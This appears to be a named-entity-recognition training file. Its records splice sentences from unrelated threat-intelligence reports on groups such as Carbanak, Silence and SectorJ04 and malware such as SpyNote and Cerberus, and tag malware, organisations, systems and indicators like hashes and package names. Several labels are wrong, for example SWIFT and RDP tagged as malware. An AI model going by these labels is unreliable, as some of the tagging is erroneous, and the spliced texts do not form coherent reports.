{"text": "Next to the features , we expect the target list to be expanded to contain additional ( banking ) apps in the near future . In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi . While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization .", "spans": [{"start": 165, "end": 175, "label": "System"}, {"start": 180, "end": 190, "label": "System"}, {"start": 250, "end": 257, "label": "System"}, {"start": 262, "end": 273, "label": "System"}, {"start": 315, "end": 326, "label": "Organization"}, {"start": 358, "end": 371, "label": "Organization"}, {"start": 438, "end": 451, "label": "Vulnerability"}]}
{"text": "Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud ; Cerberus is yet a new Trojan active in the wild ! AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm .", "spans": [{"start": 142, "end": 150, "label": "Malware"}, {"start": 200, "end": 221, "label": "Malware"}, {"start": 222, "end": 232, "label": "System"}, {"start": 237, "end": 247, "label": "System"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 396, "end": 399, "label": "Organization"}, {"start": 424, "end": 432, "label": "Malware"}, {"start": 444, "end": 457, "label": "Organization"}, {"start": 467, "end": 475, "label": "Malware"}]}
{"text": "Appendix Samples Some of the latest Cerberus samples found in the wild : App name Package name SHA 256 hash Flash Player com.uxlgtsvfdc.zipvwntdy 728a6ea44aab94a2d0ebbccbf0c1b4a93fbd9efa8813c19a88d368d6a46b4f4f Flash Player com.ognbsfhszj.hqpquokjdp fe28aba6a942b6713d7142117afdf70f5e731c56eff8956ecdb40cdc28c7c329 The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor . BRONZE BUTLER compromises organizations to conduct cyberespionage , primarily focusing on Japan .", "spans": [{"start": 36, "end": 44, "label": "Malware"}, {"start": 108, "end": 120, "label": "System"}, {"start": 121, "end": 145, "label": "Indicator"}, {"start": 146, "end": 210, "label": "Indicator"}, {"start": 211, "end": 223, "label": "System"}, {"start": 224, "end": 249, "label": "Indicator"}, {"start": 250, "end": 314, "label": "Indicator"}, {"start": 319, "end": 328, "label": "Organization"}, {"start": 669, "end": 682, "label": "Organization"}, {"start": 720, "end": 734, "label": "Organization"}]}
{"text": "Flash Player com.mwmnfwt.arhkrgajn ffa5ac3460998e7b9856fc136ebcd112196c3abf24816ccab1fbae11eae4954c Flash Player com.wogdjywtwq.oiofvpzpxyo 6ac7e7ed83b4b57cc4d28f14308d69d062d29a544bbde0856d5697b0fc50cde4 Flash Player com.hvdnaiujzwo.fovzeukzywfr Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 . Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": [{"start": 0, "end": 12, "label": "System"}, {"start": 13, "end": 34, "label": "Indicator"}, {"start": 35, "end": 99, "label": "Indicator"}, {"start": 100, "end": 112, "label": "System"}, {"start": 113, "end": 139, "label": "Indicator"}, {"start": 140, "end": 204, "label": "Indicator"}, {"start": 205, "end": 217, "label": "System"}, {"start": 218, "end": 246, "label": "Indicator"}, {"start": 260, "end": 269, "label": "Organization"}, {"start": 353, "end": 363, "label": "System"}, {"start": 368, "end": 383, "label": "System"}, {"start": 574, "end": 582, "label": "Organization"}]}
{"text": "cfd77ddc5c1ebb8498c899a68ea75d2616c1c92a0e618113d7c9e5fcc650094b Flash Player com.gzhlubw.pmevdiexmn 3f2ed928789c200e21fd0c2095619a346f75d84f76f1e54a8b3153385850ea63 Target list The actual observed list of mobile apps targeted by Cerberus contains a total of 30 unique applications . The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam . Carbanak is a remote backdoor ( initially based on Carberp ) , designed for espionage , data Exfiltration and to provide remote access to infected machines .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 77, "label": "System"}, {"start": 78, "end": 100, "label": "Indicator"}, {"start": 101, "end": 165, "label": "Indicator"}, {"start": 230, "end": 238, "label": "Malware"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 426, "end": 434, "label": "Malware"}, {"start": 477, "end": 484, "label": "Malware"}]}
{"text": "This list is expected to expand : Package name Application name com.android.vending Play Market com.boursorama.android.clients Boursorama Banque com.caisseepargne.android.mobilebanking Banque com.chase.sig.android Chase Mobile com.clairmail.fth Fifth Third Mobile Banking com.connectivityapps.hotmail Connect for Hotmail com.google.android.gm Gmail com.imo.android.imoim imo free video calls and chat com.infonow.bofa Bank of America This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company\u2019s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 . Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks .", "spans": [{"start": 64, "end": 83, "label": "Indicator"}, {"start": 84, "end": 95, "label": "System"}, {"start": 96, "end": 137, "label": "Indicator"}, {"start": 138, "end": 144, "label": "System"}, {"start": 145, "end": 184, "label": "Indicator"}, {"start": 185, "end": 191, "label": "System"}, {"start": 192, "end": 213, "label": "Indicator"}, {"start": 214, "end": 226, "label": "System"}, {"start": 227, "end": 244, "label": "Indicator"}, {"start": 245, "end": 271, "label": "System"}, {"start": 272, "end": 300, "label": "Indicator"}, {"start": 301, "end": 320, "label": "System"}, {"start": 321, "end": 342, "label": "Indicator"}, {"start": 343, "end": 348, "label": "System"}, {"start": 349, "end": 370, "label": "Indicator"}, {"start": 371, "end": 374, "label": "System"}, {"start": 401, "end": 417, "label": "Indicator"}, {"start": 418, "end": 433, "label": "System"}, {"start": 550, "end": 559, "label": "Organization"}, {"start": 721, "end": 730, "label": "Organization"}, {"start": 754, "end": 762, "label": "Organization"}, {"start": 831, "end": 844, "label": "Organization"}]}
{"text": "Mobile Banking com.IngDirectAndroid ING com.instagram.android Instagram com.konylabs.capitalone Capital One\u00ae Mobile com.mail.mobile.android.mail mail.com mail com.microsoft.office.outlook Microsoft Outlook com.snapchat.android Snapchat com.tencent.mm WeChat com.twitter.android Twitter com.ubercab Uber com.usaa.mobile.android.usaa USAA Mobile com.usbank.mobilebanking U.S. Bank - Inspired by customers com.viber.voip Viber com.wf.wellsfargomobile SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea\u2019s media , manufacturing and universities , around February and March 2019 . In some cases , the attackers used the Society for Worldwide Interbank Financial Telecommunication ( SWIFT ) network to transfer money to their accounts .", "spans": [{"start": 15, "end": 35, "label": "Indicator"}, {"start": 40, "end": 71, "label": "Indicator"}, {"start": 72, "end": 95, "label": "Indicator"}, {"start": 96, "end": 115, "label": "System"}, {"start": 116, "end": 153, "label": "Indicator"}, {"start": 154, "end": 158, "label": "System"}, {"start": 159, "end": 187, "label": "Indicator"}, {"start": 188, "end": 205, "label": "System"}, {"start": 206, "end": 226, "label": "Indicator"}, {"start": 227, "end": 235, "label": "System"}, {"start": 236, "end": 250, "label": "Indicator"}, {"start": 251, "end": 257, "label": "System"}, {"start": 258, "end": 277, "label": "Indicator"}, {"start": 278, "end": 285, "label": "System"}, {"start": 286, "end": 297, "label": "Indicator"}, {"start": 298, "end": 302, "label": "Organization"}, {"start": 303, "end": 331, "label": "Indicator"}, {"start": 332, "end": 343, "label": "System"}, {"start": 344, "end": 373, "label": "Indicator"}, {"start": 403, "end": 417, "label": "Indicator"}, {"start": 418, "end": 423, "label": "System"}, {"start": 424, "end": 447, "label": "Indicator"}, {"start": 448, "end": 457, "label": "Organization"}, {"start": 550, "end": 555, "label": "Organization"}, {"start": 558, "end": 571, "label": "Organization"}, {"start": 576, "end": 588, "label": "Organization"}, {"start": 644, "end": 653, "label": "Organization"}, {"start": 675, "end": 722, "label": "Malware"}, {"start": 725, "end": 730, "label": "Malware"}]}
{"text": "Wells Fargo Mobile com.whatsapp WhatsApp com.yahoo.mobile.client.android.mail Yahoo Mail \u2013 Organized Email fr.banquepopulaire.cyberplus Banque Populaire fr.creditagricole.androidapp Ma Banque jp.co.rakuten_bank.rakutenbank \u697d\u5929\u9280\u884c -\u500b\u4eba\u306e\u304a\u5ba2\u69d8\u5411\u3051\u30a2\u30d7\u30ea mobi.societegenerale.mobile.lappli L \u2019 Appli Soci\u00e9t\u00e9 G\u00e9n\u00e9rale net.bnpparibas.mescomptes Mes Comptes BNP Paribas org.telegram.messenger Telegram Triout - Spyware Framework SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker\u2019s server when the malicious documents were run . Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 19, "end": 31, "label": "Indicator"}, {"start": 32, "end": 40, "label": "System"}, {"start": 41, "end": 77, "label": "Indicator"}, {"start": 78, "end": 88, "label": "System"}, {"start": 107, "end": 135, "label": "Indicator"}, {"start": 136, "end": 142, "label": "System"}, {"start": 153, "end": 181, "label": "Indicator"}, {"start": 182, "end": 191, "label": "System"}, {"start": 192, "end": 222, "label": "Indicator"}, {"start": 241, "end": 275, "label": "Indicator"}, {"start": 303, "end": 328, "label": "Indicator"}, {"start": 353, "end": 384, "label": "Indicator"}, {"start": 385, "end": 391, "label": "Malware"}, {"start": 412, "end": 421, "label": "Organization"}, {"start": 542, "end": 552, "label": "Organization"}, {"start": 600, "end": 608, "label": "Indicator"}, {"start": 614, "end": 622, "label": "Malware"}, {"start": 635, "end": 644, "label": "Organization"}]}
{"text": "for Android with Extensive Surveillance Capabilities August 20 , 2018 No operating system is safe from malware , as cyber criminals will always want to steal , spy or tamper with your data . SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 . If found on the target system , Carbanak will try to exploit a known vulnerability in Windows XP , Windows Server 2003 , Windows Vista , Windows Server 2008 , Windows 7 , Windows 8 , and Windows Server 2012 , CVE-2013-3660 , for local privilege escalation .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 246, "end": 255, "label": "Organization"}, {"start": 352, "end": 360, "label": "Malware"}, {"start": 373, "end": 380, "label": "Vulnerability"}, {"start": 406, "end": 413, "label": "System"}, {"start": 419, "end": 426, "label": "System"}, {"start": 441, "end": 448, "label": "System"}, {"start": 457, "end": 464, "label": "System"}, {"start": 479, "end": 486, "label": "System"}, {"start": 491, "end": 498, "label": "System"}, {"start": 507, "end": 514, "label": "System"}, {"start": 529, "end": 542, "label": "Vulnerability"}]}
{"text": "The proliferation of Android devices \u2013 from smartphones to tablets and smart TVs \u2013 has opened up new possibilities for malware developers , as all these devices pack microphones , cameras and location-tracking hardware they can turn into the perfect spy tools . SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto .", "spans": [{"start": 21, "end": 28, "label": "Malware"}, {"start": 262, "end": 271, "label": "Organization"}, {"start": 319, "end": 328, "label": "Organization"}, {"start": 454, "end": 477, "label": "Malware"}, {"start": 480, "end": 483, "label": "Malware"}, {"start": 488, "end": 496, "label": "Malware"}]}
{"text": "Bitdefender researchers have identified a new Android spyware , dubbed Triout , which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications . In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea . Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 46, "end": 53, "label": "System"}, {"start": 71, "end": 77, "label": "Malware"}, {"start": 217, "end": 226, "label": "Organization"}, {"start": 331, "end": 340, "label": "Organization"}, {"start": 343, "end": 355, "label": "Organization"}, {"start": 358, "end": 369, "label": "Organization"}, {"start": 374, "end": 388, "label": "Organization"}, {"start": 406, "end": 414, "label": "Malware"}]}
{"text": "Found bundled with a repackaged app , the spyware \u2019 s surveillance capabilities involve hiding its presence on the device , recording phone calls , logging incoming text messages , recoding videos , taking pictures and collecting GPS coordinates , then broadcasting all of that to an attacker-controlled C & C ( command and control ) server . In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong . Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": [{"start": 230, "end": 233, "label": "System"}, {"start": 365, "end": 374, "label": "Organization"}, {"start": 657, "end": 665, "label": "Malware"}]}
{"text": "It \u2019 s interesting that Triout , which is detected by Bitdefender \u2019 s machine learning algorithms , was first submitted from Russia , and most scans/reports came from Israel . Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity . Existing telemetry indicates that the Carbanak attackers are trying to expand operations to other Baltic and Central Europe countries , the Middle East , Asia and Africa .", "spans": [{"start": 24, "end": 30, "label": "Malware"}, {"start": 54, "end": 65, "label": "Organization"}, {"start": 349, "end": 357, "label": "Malware"}, {"start": 358, "end": 367, "label": "Organization"}]}
{"text": "The sample \u2019 s first appearance seems to be May 15 , 2018 , when it was uploaded to VirusTotal , but it \u2019 s unclear how the tainted sample is disseminated . They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities . FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015 .", "spans": [{"start": 84, "end": 94, "label": "Organization"}, {"start": 201, "end": 207, "label": "Organization"}, {"start": 314, "end": 318, "label": "Organization"}]}
{"text": "Third-party marketplaces or some other attacker-controlled domains are likely used to host the sample . Now , Silence is one of the most active threat actors targeting the financial sector . As with previous campaigns , and as highlighted in our annual M-Trends 2017 report , FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process .", "spans": [{"start": 110, "end": 117, "label": "Organization"}, {"start": 172, "end": 181, "label": "Organization"}, {"start": 253, "end": 261, "label": "Organization"}, {"start": 276, "end": 280, "label": "Organization"}]}
{"text": "A subsequent investigation revealed that the spyware has the following capabilities : Records every phone call ( literally the conversation as a media file ) , then sends it together with the caller id to the C & C ( incall3.php and outcall3.php ) Logs every incoming SMS message ( SMS body and SMS sender ) to C & C ( script3.php ) Has capability to hide self Can send all call logs ( \u201c content : //call_log/calls \u201d , info : callname , callnum , calldate , calltype , callduration Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 217, "end": 228, "label": "Indicator"}, {"start": 233, "end": 245, "label": "Indicator"}, {"start": 319, "end": 330, "label": "Indicator"}, {"start": 388, "end": 414, "label": "Indicator"}, {"start": 522, "end": 530, "label": "Organization"}, {"start": 655, "end": 665, "label": "Organization"}, {"start": 703, "end": 711, "label": "Malware"}, {"start": 778, "end": 787, "label": "Organization"}, {"start": 828, "end": 846, "label": "Organization"}, {"start": 870, "end": 879, "label": "Organization"}]}
{"text": ") to C & C ( calllog.php ) Whenever the user snaps a picture , either with the front or rear camera , it gets sent to the C & C ( uppc.php , fi npic.php orreqpic.php ) Can send GPS coordinates to C & C ( gps3.php ) The C & C server to which the application seems to be sending collected data appears to be operational , as of this writing , and running since May 2018 . Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world . While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms .", "spans": [{"start": 13, "end": 24, "label": "Indicator"}, {"start": 130, "end": 138, "label": "Indicator"}, {"start": 144, "end": 152, "label": "Indicator"}, {"start": 153, "end": 165, "label": "Indicator"}, {"start": 177, "end": 180, "label": "System"}, {"start": 204, "end": 212, "label": "Indicator"}, {"start": 370, "end": 377, "label": "Organization"}, {"start": 512, "end": 516, "label": "Organization"}, {"start": 530, "end": 533, "label": "Malware"}]}
{"text": "January 23 , 2017 SpyNote RAT posing as Netflix app As users have become more attached to their mobile devices , they want everything on those devices . Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell . This report describes the details and type of operations carried out by Carbanak that focuses on financial industry , such as payment providers , retail industry and PR companies .", "spans": [{"start": 18, "end": 29, "label": "Malware"}, {"start": 40, "end": 51, "label": "System"}, {"start": 153, "end": 160, "label": "Organization"}, {"start": 180, "end": 185, "label": "System"}, {"start": 212, "end": 221, "label": "System"}, {"start": 325, "end": 333, "label": "Malware"}, {"start": 350, "end": 368, "label": "Organization"}, {"start": 379, "end": 396, "label": "Organization"}, {"start": 399, "end": 414, "label": "Organization"}, {"start": 419, "end": 431, "label": "Organization"}]}
{"text": "There \u2019 s an app for just about any facet of one \u2019 s personal and professional life , from booking travel and managing projects , to buying groceries and binge-watching the latest Netflix series . Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence\u2019s activity . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 180, "end": 187, "label": "Organization"}, {"start": 210, "end": 222, "label": "Organization"}, {"start": 368, "end": 373, "label": "Organization"}, {"start": 413, "end": 431, "label": "Organization"}, {"start": 434, "end": 442, "label": "Malware"}, {"start": 510, "end": 518, "label": "Organization"}, {"start": 610, "end": 617, "label": "Malware"}]}
{"text": "The iOS and Android apps for Netflix are enormously popular , effectively turning a mobile device into a television with which users can stream full movies and TV programs anytime , anywhere . Since the report\u2019s release in September 2018 , Group-IB\u2019s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence . The group has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 12, "end": 19, "label": "System"}, {"start": 29, "end": 36, "label": "Organization"}, {"start": 240, "end": 250, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 330, "end": 337, "label": "Organization"}, {"start": 417, "end": 425, "label": "Organization"}, {"start": 517, "end": 524, "label": "Malware"}]}
{"text": "But the apps , with their many millions of users , have captured the attention of the bad actors , too , who are exploiting the popularity of Netflix to spread malware . Like the majority of APT groups , Silence uses phishing as their infection vector . From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space .", "spans": [{"start": 142, "end": 149, "label": "Organization"}, {"start": 204, "end": 211, "label": "Organization"}, {"start": 264, "end": 272, "label": "Malware"}, {"start": 309, "end": 314, "label": "Organization"}, {"start": 319, "end": 337, "label": "Organization"}, {"start": 379, "end": 384, "label": "Organization"}]}
{"text": "Recently , the ThreatLabZ research team came across a fake Netflix app , which turned out to be a new variant of SpyNote RAT ( Remote Access Trojan ) . In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": [{"start": 15, "end": 25, "label": "Organization"}, {"start": 54, "end": 70, "label": "System"}, {"start": 113, "end": 124, "label": "Malware"}, {"start": 254, "end": 261, "label": "Organization"}, {"start": 336, "end": 344, "label": "Malware"}, {"start": 404, "end": 409, "label": "Organization"}, {"start": 416, "end": 431, "label": "Organization"}]}
{"text": "SpyNote RAT is capable of performing a variety of alarming functions that includes : Activating the device \u2019 s microphone and listening to live conversations Executing commands on the device Copying files from the device to a Command & Control ( C & C ) center Recording screen captures Viewing contacts Reading SMS messages The screenshot below shows part of the sandbox \u2019 s report on the SpyNote RAT \u2019 s signature and detected functions : The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder , Prior to April 2018 , as described in Group-IB\u2019s Silence: Moving into the darkside report , Silence\u2019s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . The first successful bank robbery was committed by this group in January 2013 .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 390, "end": 401, "label": "Malware"}, {"start": 450, "end": 457, "label": "Organization"}, {"start": 540, "end": 551, "label": "Malware"}, {"start": 600, "end": 610, "label": "Organization"}]}
{"text": "which was leaked last year . In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": [{"start": 39, "end": 46, "label": "Organization"}, {"start": 223, "end": 231, "label": "Malware"}, {"start": 326, "end": 336, "label": "Malware"}, {"start": 341, "end": 352, "label": "Malware"}]}
{"text": "Technical details Please note that our research is not about the legitimate Netflix app on Google Play . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . We have no evidence of compromises against banks in Western Europe or United States , but it should be noted that the attackers methods could be utilized against banks outside of Russia as well .", "spans": [{"start": 76, "end": 87, "label": "System"}, {"start": 91, "end": 102, "label": "System"}, {"start": 116, "end": 123, "label": "Organization"}, {"start": 177, "end": 194, "label": "Malware"}, {"start": 259, "end": 264, "label": "Organization"}, {"start": 310, "end": 315, "label": "Organization"}, {"start": 385, "end": 394, "label": "Organization"}, {"start": 429, "end": 434, "label": "Organization"}]}
{"text": "The spyware in this analysis was portraying itself as the Netflix app . Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list . Additionally the reports on Carbanak show a different picture , where banks targeted outside of Russia , specifically Europe , USA and Japan are mentioned , which does not match our research .", "spans": [{"start": 58, "end": 69, "label": "System"}, {"start": 72, "end": 79, "label": "Organization"}, {"start": 231, "end": 239, "label": "Malware"}, {"start": 273, "end": 278, "label": "Organization"}]}
{"text": "Once installed , it displayed the icon found in the actual Netflix app on Google Play . Group-IB has also detected recon emails sent out to New Zealand . Without any insight into the evidence Kaspersky has obtained , we can only repeat our view that Anunak has targeted only banks in Russia and we have no concrete reports of compromised banks outside of Russia directly related to this criminal group .", "spans": [{"start": 59, "end": 70, "label": "System"}, {"start": 74, "end": 85, "label": "System"}, {"start": 88, "end": 96, "label": "Organization"}, {"start": 115, "end": 127, "label": "Malware"}, {"start": 192, "end": 201, "label": "Organization"}, {"start": 250, "end": 256, "label": "Organization"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 338, "end": 343, "label": "Organization"}]}
{"text": "As soon as the user clicks the spyware \u2019 s icon for the first time , nothing seems to happen and the icon disappears from the home screen . Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe . Charming Kitten is an Iranian cyberespionage group operating since approximately 2014 .", "spans": [{"start": 171, "end": 178, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 290, "end": 305, "label": "Organization"}]}
{"text": "This is a common trick played by malware developers , making the user think the app may have been removed . In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": [{"start": 127, "end": 134, "label": "Organization"}, {"start": 169, "end": 181, "label": "Organization"}, {"start": 248, "end": 263, "label": "Organization"}, {"start": 324, "end": 332, "label": "Organization"}, {"start": 368, "end": 376, "label": "Malware"}, {"start": 394, "end": 415, "label": "Organization"}, {"start": 428, "end": 441, "label": "Organization"}]}
{"text": "But , behind the scenes , the malware has not been removed ; instead it starts preparing its onslaught of attacks . In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and South Korea . The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research .", "spans": [{"start": 127, "end": 134, "label": "Organization"}, {"start": 248, "end": 264, "label": "Organization"}, {"start": 334, "end": 351, "label": "Organization"}]}
{"text": "For contacting C & C , the spyware was found to be using free DNS services , as shown in the screenshot below : SpyNote RAT uses an unusual trick to make sure that it remains up and running and that the spying does not stop . Prior to April 2018 , as described in Group-IB\u2019s Silence: Moving into the darkside report , Silence\u2019s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens .", "spans": [{"start": 62, "end": 65, "label": "Indicator"}, {"start": 112, "end": 123, "label": "Malware"}, {"start": 264, "end": 274, "label": "Organization"}, {"start": 318, "end": 327, "label": "Organization"}, {"start": 706, "end": 719, "label": "Organization"}, {"start": 730, "end": 736, "label": "Organization"}, {"start": 741, "end": 752, "label": "Organization"}]}
{"text": "It does so using the Services , Broadcast Receivers , and Activities components of the Android platform . From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database . Flying Kitten ( which is another name given by the security industry to Charming Kitten ) was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of the IRI ( Islamic Republic of Iran ) government and foreign espionage targets .", "spans": [{"start": 87, "end": 94, "label": "System"}, {"start": 147, "end": 154, "label": "Organization"}, {"start": 237, "end": 250, "label": "Organization"}, {"start": 288, "end": 305, "label": "Organization"}, {"start": 309, "end": 324, "label": "Organization"}, {"start": 348, "end": 354, "label": "Organization"}]}
{"text": "Services can perform long-running operations in the background and does not need a user interface . As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .LNK shortcuts as malicious attachments . Flying Kitten was one of the first groups to be described as a coherent threat actor conducting operations against political opponents of government and foreign espionage targets .", "spans": [{"start": 138, "end": 145, "label": "Organization"}, {"start": 268, "end": 281, "label": "Organization"}, {"start": 303, "end": 309, "label": "Organization"}, {"start": 406, "end": 416, "label": "Organization"}]}
{"text": "Broadcast Receivers are Android components that can register themselves for particular events . In the former Soviet Union , Silence targeted banks in Kyrgyzstan , Kazakhstan , and Ukraine . At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" .", "spans": [{"start": 24, "end": 31, "label": "System"}, {"start": 125, "end": 132, "label": "Organization"}, {"start": 142, "end": 147, "label": "Organization"}, {"start": 276, "end": 290, "label": "Organization"}]}
{"text": "Activities are key building blocks , central to an app \u2019 s navigation , for example . In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke . During intense intelligence gathering over the last 24 months , we observed the technical capabilities of the Operation Cleaver team rapidly evolve faster than any previously observed Iranian effort .", "spans": [{"start": 96, "end": 104, "label": "Organization"}, {"start": 170, "end": 175, "label": "Malware"}, {"start": 288, "end": 305, "label": "Organization"}]}
{"text": "The SpyNote RAT registers a service called AutoStartup and a broadcast receiver named BootComplete . The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . TinyZBot is a bot written in C# and developed by the Cleaver team .", "spans": [{"start": 4, "end": 15, "label": "Malware"}, {"start": 105, "end": 124, "label": "Malware"}, {"start": 197, "end": 204, "label": "Malware"}, {"start": 230, "end": 238, "label": "Malware"}, {"start": 259, "end": 261, "label": "System"}, {"start": 283, "end": 290, "label": "Organization"}]}
{"text": "MainActivity registers BootComplete with a boot event , so that whenever the device is booted , BootComplete gets triggered . As the CnC server , Silence use CnC-3 server running Windows , from which they send commands to download additional modules . Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black Hats and many others 9 .", "spans": [{"start": 146, "end": 153, "label": "Organization"}, {"start": 158, "end": 170, "label": "System"}, {"start": 307, "end": 317, "label": "Organization"}, {"start": 320, "end": 328, "label": "Organization"}, {"start": 339, "end": 361, "label": "Organization"}, {"start": 364, "end": 399, "label": "Organization"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 413, "end": 421, "label": "Organization"}, {"start": 424, "end": 439, "label": "Organization"}]}
{"text": "BootComplete starts the AutoStartup service and the AutoStartup service makes sure that MainActivity is always running . To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe . However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team .", "spans": [{"start": 143, "end": 148, "label": "Organization"}, {"start": 158, "end": 175, "label": "System"}, {"start": 197, "end": 204, "label": "Organization"}, {"start": 227, "end": 239, "label": "Malware"}, {"start": 280, "end": 287, "label": "Organization"}, {"start": 341, "end": 351, "label": "Organization"}, {"start": 354, "end": 362, "label": "Organization"}, {"start": 385, "end": 407, "label": "Organization"}]}
{"text": "What follows are some of the features exhibited by SpyNote RAT . In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and Silence. ProxyBot.NET , which are described in detail in the report Silence: moving into the darkside . The Cobalt group 's traditional \" stomping grounds \" are the Eastern Europe , Central Asia , and Southeast Asia .", "spans": [{"start": 51, "end": 62, "label": "Malware"}, {"start": 79, "end": 86, "label": "Organization"}, {"start": 124, "end": 140, "label": "System"}, {"start": 145, "end": 166, "label": "System"}, {"start": 253, "end": 265, "label": "Organization"}]}
